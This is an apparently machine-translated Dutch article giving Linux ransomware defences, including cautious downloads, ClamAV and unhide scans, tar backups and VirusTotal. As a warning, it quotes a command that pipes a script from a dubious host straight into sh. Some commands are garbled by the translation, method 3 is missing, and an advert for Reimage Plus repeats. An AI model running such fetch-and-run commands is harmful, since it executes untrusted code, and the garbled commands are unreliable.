Hoe Linux te beschermen tegen Ransomwares
Ransomware is tegenwoordig een van de meer bedreigende problemen in de wereld van netwerkbeveiliging. Het is beangstigend om te denken dat iemand je gegevens in gijzeling kan houden. Sommige ransomware-infecties coderen alle gegevens op een bepaald volume en de personen erachter vereisen een bepaald bedrag voordat ze ermee instemmen om de sleutel vrij te geven die nodig is om de gegevens te ontgrendelen. Het is vooral zorgwekkend voor mensen die veel geld geïnvesteerd hebben in hun gegevens. Er is echter een klein beetje goed nieuws voor Linux-gebruikers.
In de meeste situaties is het moeilijk voor een ransomwarecode om controle te krijgen over iets meer dan alleen de basismap van een gebruiker. Deze programma's hebben niet de rechten om een volledige installatie te verwijderen. Dit is waarom Linux ransomware meer een probleem is op servers waar operators altijd root-toegang hebben. Ransomware zou niet zo'n probleem moeten zijn voor Linux-gebruikers, en er zijn verschillende stappen die moeten worden genomen om te voorkomen dat het voor jou gebeurt.
Methode 1: Verdedigen tegen BashCrypt-achtige aanvallen
BasyCrypt is een ransomware-proof of concept die heeft bewezen dat het mogelijk is om serverstructuren met dit type kwaadaardige code te infecteren. Dit biedt een basis voor hoe Linux-ransomware-pakketten eruit kunnen zien. Hoewel ze op dit moment ongebruikelijk zijn, werken dezelfde soorten preventieve maatregelen op het gebied van gezond verstand voor serverbeheerders van andere platforms hier net zo goed. Het probleem is dat in bedrijfsomgevingen een groot aantal verschillende mensen een hostsysteem kunnen gebruiken.
Als je een mailserver draait, kan het heel moeilijk zijn om te voorkomen dat mensen domme dingen doen. Doe je best om iedereen eraan te herinneren geen bijlagen te openen waarvan ze niet zeker weten, en scan altijd alles wat in kwestie malware is. Een ander ding dat echt kan helpen om dit soort aanvallen te voorkomen, is door te kijken hoe je binaries met wget installeert. Natuurlijk ontbreekt uw e-mailserver waarschijnlijk helemaal aan een bureaubladomgeving en u gebruikt waarschijnlijk wget, apt-get, yum of pacman om pakketten te beheren die voorbij komen. Het is erg belangrijk om te zien welke repositories in deze installaties worden gebruikt. Soms zie je een commando dat wil dat je iets als wget uitvoert. Http: //www.thisisaprettybadcoderepo.webs/ -O- | sh of het kan een binnenkant van een shellscript zijn. Voer het op geen enkele manier uit als u niet weet waarvoor die repository is bedoeld.
Methode 2: een scannerpakket installeren
Er bestaan verschillende soorten scansystemen voor open-source malware. ClamAV is veruit de beroemdste en u kunt het op vele apt-gebaseerde distributies installeren met behulp van:
sudo apt-get install clamav
Wanneer het is geïnstalleerd, moet man clamav het gebruik in duidelijke taal uitleggen. Houd er rekening mee dat het weliswaar geïnfecteerde bestanden kan scannen en verwijderen, maar dat het geen infectieuze code uit een bestand kan verwijderen. Dit is een alles of niets situatie.
Er is een tweede scanner die u misschien niet kent, maar het is handig als verborgen processen u bang maken. Nogmaals als u een apt-gebaseerde distributie gebruikt, geeft u deze opdracht om de unhide-scanner te installeren:
sudo apt-get install unhide
PRO TIP: Als het probleem zich voordoet met uw computer of een laptop / notebook, kunt u proberen de Reimage Plus-software te gebruiken die de opslagplaatsen kan scannen en corrupte en ontbrekende bestanden kan vervangen. Dit werkt in de meeste gevallen, waar het probleem is ontstaan door een systeembeschadiging. U kunt Reimage Plus downloaden door hier te klikken
Typ het volgende als het is geïnstalleerd:
sudo unhide sys
Dit zal een volledige scan van uw systeem uitvoeren voor verborgen processen.
Methode 4: Schone back-ups bij de hand houden
Hoewel dit geen probleem zou mogen zijn, omdat iedereen altijd back-ups moet maken, kan het hebben van goede back-ups ransomware meteen uitschakelen. Welke zeer kleine ransomware er op het Linux-platform is, neigt ernaar om bestanden aan te vallen met extensies die specifiek zijn voor webontwikkelingsplatforms. Dit betekent dat als je een heleboel .php-, .xml- of .js-code hebt, je specifiek een back-up wilt maken. Overweeg deze volgende regel code:
tar -cf backups.tar $ (find -name * .ruby -or -name * .html)
Dit zou een groot tape-archiefbestand moeten maken van elk bestand met de .ruby- en .html-extensies binnen een bestandsstructuur. Het kan dan worden verplaatst naar een andere tijdelijke submap voor extraheren om ervoor te zorgen dat het goed werkt.
Dit tape-archief kan en moet worden verplaatst naar een extern volume. Je kunt natuurlijk .bz2, .gz of .xv compressie gebruiken voordat je dit doet. Mogelijk wilt u gespiegelde back-ups maken door deze naar twee verschillende volumes te kopiëren.
Methode 5: Web-based scanners gebruiken
Misschien heb je een RPM- of DEB-pakket gedownload van een site die belooft bruikbare software te bevatten. Software wordt ook gedistribueerd via 7z of gecomprimeerde tar-bestanden. Mobiele gebruikers ontvangen mogelijk ook Android-pakketten in APK-indeling. U kunt deze eenvoudig scannen met een hulpmiddel in uw browser. Wijs dit aan op https://www.virustotal.com/ en klik op de knop Bestand kiezen zodra de pagina is geladen. Houd er rekening mee dat dit een openbare server is voordat u uploadt. Hoewel het veilig is en wordt beheerd door Alphabet Inc, worden bestanden wel openbaar overgezet, wat een probleem kan zijn in sommige superveilige omgevingen. Het is ook beperkt tot 128 MB-bestanden.
Selecteer uw bestand in het vak dat verschijnt en selecteer Openen. De bestandsnaam verschijnt op de regel naast de knop nadat het vakje is verdwenen.
Klik op de grote blauwe Scan it! knop. U ziet een ander vak dat aangeeft dat het systeem uw bestand uploadt.
Als iemand het bestand al eerder heeft uitgecheckt, zal het u op de hoogte stellen van het vorige rapport. Het herkent dit op basis van een SHA256-som, die op dezelfde manier werkt als dezelfde Linux-opdrachtregelprogramma's die u gewend bent. Als dat niet het geval is, voert het een volledige scan uit met 53 verschillende scanprogramma's. Een paar van hen kunnen een time-out krijgen als het bestand wordt uitgevoerd en deze resultaten kunnen veilig worden genegeerd.
Sommige programma's kunnen andere resultaten opleveren dan andere, dus het is gemakkelijk om met dit systeem valse positieven uit te roeien. Het beste deel is dat het werkt tussen verschillende platforms, waardoor het net zo aantrekkelijk is, ongeacht welke distributie je op verschillende apparaten hebt. Het werkt ook net zo goed via mobiele distributies zoals Android, wat ook weer de reden is waarom het een geweldige manier is om APK-pakketten te inspecteren voordat ze worden gebruikt.
PRO TIP: Als het probleem zich voordoet met uw computer of een laptop / notebook, kunt u proberen de Reimage Plus-software te gebruiken die de opslagplaatsen kan scannen en corrupte en ontbrekende bestanden kan vervangen. Dit werkt in de meeste gevallen, waar het probleem is ontstaan door een systeembeschadiging. U kunt Reimage Plus downloaden door hier te klikken